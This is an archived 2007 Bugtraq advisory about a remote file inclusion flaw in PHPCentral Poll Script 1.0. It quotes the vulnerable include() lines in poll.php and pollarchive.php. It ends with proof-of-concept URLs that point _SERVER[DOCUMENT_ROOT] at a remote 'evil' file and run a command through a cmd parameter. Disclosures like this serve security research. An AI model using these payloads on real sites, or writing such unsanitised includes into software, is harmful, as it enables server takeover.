lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: 12 Aug 2007 15:17:30 -0000
From: rizgar@...uxmail.org
To: bugtraq@...urityfocus.com
Subject: PHPCentral Poll Script Remote Command Execution Vulnerability

PHPCentral Poll Script Remote Command Execution Vulnerability
-----------------------------------------------------------------------

Script : PHPCentral Poll Script

Version : 1.0

Site : http://www.phpcentral.org/scripts.php

Founder : Rizgar

Contact : rizgar@...uxmail.org and irc.gigachat.net #kurdhack

Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)

d0rk : not d0rk :)

-----------------------------------------------------------------------

Vulnerability details : 


This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of the PHPCentral Poll script. 


------------------------------------------------------------------------

look at poll.php, pollarchive.php


poll.php ;

Lines 2,3,4 ;

$folder = "poll"; // Folder in which poll files are -- (default folder is "poll")
include("".$_SERVER[DOCUMENT_ROOT]."/$folder/functions.php");
include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");


pollarchive.php 

Lines : 2,3,4


$folder = "poll"; // Folder in which poll files are -- (default folder is "poll")
include("".$_SERVER[DOCUMENT_ROOT]."/$folder/functions.php");
include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");


PoC :

http://www.example.com/poll.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&cmd=id

http://www.example.com/pollarchive.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&cmd=id

# milw0rm.com [2007-08-10]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ